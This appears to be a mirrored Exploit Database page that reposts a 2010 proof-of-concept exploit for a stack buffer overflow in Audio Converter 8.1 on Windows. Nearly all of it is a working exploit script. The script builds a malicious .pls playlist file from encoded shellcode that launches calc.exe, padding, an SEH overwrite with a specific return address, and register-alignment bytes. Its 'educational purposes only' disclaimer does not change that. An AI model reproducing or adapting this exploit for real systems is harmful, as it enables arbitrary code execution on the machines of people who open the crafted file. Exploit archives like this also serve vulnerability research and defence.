Audio Converter 8.1 – Local Stack Buffer Overflow

• Exploit Database
• 13 阅读

• 作者： sud0
  日期： 2010-06-07
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13760/

• #***********************************************************************************
  # Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
  # Date: 16/05/2010
  # Author: Sud0
  # Bug found by: chap0
  # Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
  # Version : 8.1
  # OS: Windows
  # Tested on : XP SP3 En (VirtualBox)
  # Type of vuln: SEH
  # Thanks to my wife for her support
  # Thanks for chap0 for bringing us the game
  # Greetz to: Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  # Corelan does not want anyone to use this script
  # for malicious and/or illegal purposes
  # Corelan cannot be held responsible for any illegal use.
  #
  # Note : you are not allowed to edit/modify this code. 
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  #***********************************************************************************
  #code :
  print "|------------------------------------------------------------------|\n";
  print "| __ __|\n";
  print "| _________________/ /___ _____ / /________ _____ ___|\n";
  print "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";
  print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";
  print "||\n";
  print "| http://www.corelan.be:8800 |\n";
  print "||\n";
  print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
  print "[+] Exploit for .... \n";
  
  import socket
  #shellcode running calc.exe alpha2 encoded basereg edx
  shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"
  junk="B" * (4432 - len(shell))#seh overwritten after 4432 bytes
  nseh= "\xEB\x06\xEB\x06" # jmp forward 
  seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv
  align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx
  buffer= shell + junk + nseh + seh + "\x90" * 20 + align+ "A"* 10000#added some nops after seh
   
  mefile = open('poc.pls','w');
  mefile.write(buffer);
  mefile.close()